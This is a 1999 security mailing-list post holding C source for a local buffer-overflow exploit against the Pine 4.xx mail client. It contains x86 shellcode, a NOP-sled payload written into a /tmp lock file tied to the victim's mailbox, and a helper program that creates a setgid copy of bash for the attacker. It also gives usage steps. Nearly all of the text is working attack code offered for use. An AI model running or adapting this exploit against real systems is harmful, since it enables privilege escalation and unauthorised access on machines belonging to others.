/* UNOFFICIAL exploit for Pine 4.xx [2000]*/ /* Ripped from two txts ... lcamtuf's and Aleph1's :-) [2000]*/ /* by z33d -- z33d@lighting.ml.org [2000]*/ /* if this doesn't work ,you will try with GDB-the best debugger ;-)[2000]*/ /* because we don't know where will be this bufor in memory :-( [2000]*/ /* I tested on RH 5.1 ( :-] ) [2000]*/ /* oh and you must first send some mail to -luser- [2000]*/ /* Date: Fri, 9 Apr 1999 12:18:06 -0000 From: Maurycy Prodeus To: BUGTRAQ@netspace.org Subject: Pine 4.xx exploit Hi ... I wrote exploit on Pine 4.xx , but perhaps it doesn't work well on some computer ... - you must use gdb and practice on non-root user ... Put wc.c in /tmp and compile : gcc wc.c -o wc next you must compile explpine.c (-o explpine or change in wc.c [ killall -9 explpine ] ) run this ... Send some mail to -luser- and wait wait wait ... */ #include #include #include #include #define DEFAULT_DISTANCE 0xe98 #define DEFAULT_BUFFER_SIZE 600 #define DEFAULT_EGG_SIZE 576 /* for lame: mod 4 = 0 !!!!!!!!! */ #define NOP 0x90 #define LUSER "root" char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/wc"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr, *egg , *bufor; long *addr_ptr, addr; int bsize=DEFAULT_BUFFER_SIZE; int i, eggsize=DEFAULT_EGG_SIZE; int a=0; char s[100]; struct stat x; if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } if (!(egg = malloc(eggsize))) { printf("Can't allocate memory.\n"); exit(0); } if (!(bufor = malloc(bsize+eggsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() - DEFAULT_DISTANCE; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr = egg; for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++) = NOP; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; for (i = 0; i < eggsize ; i++) bufor[i] = egg[i]; for (i=eggsize; i < eggsize+bsize+1 ; i++) bufor[i] = buff[i-eggsize]; sprintf(s,"/var/spool/mail/%s",LUSER); if (stat(s,&x)) exit(printf("Mailbox (%s) not found.\n",s)); sprintf(s,"/tmp/.%x.%x",(int)x.st_dev,(int)x.st_ino); fchmod(i=open(s,O_RDWR|O_CREAT,0600),0666); while (1) { lseek(i,0,0); write(i,bufor,bsize+eggsize); ftruncate(i,bsize+eggsize); fsync(i); printf("Tieeeee %x\n",addr+DEFAULT_DISTANCE); if (!a++) if (!flock(i,LOCK_EX)) printf("Got lock on %s.\n",s); else printf("File %s already locked, wait...\n",s); sleep(1); } } --------------end of explpine.c---------------------------------------- wc.c is a script which will be run by -luser-'s pine ... --------------wc.c------------------------ #include #define LUSER "z33d" void main() { system("cp /bin/bash /tmp/mc666"); system("chgrp "LUSER" /tmp/mc666"); system("chmod +s /tmp/mc666"); system("/usr/bin/killall -9 explpine"); putenv("TERM=linux"); execl("/usr/bin/pine","pine",0); } -------------end of wc.c--------------------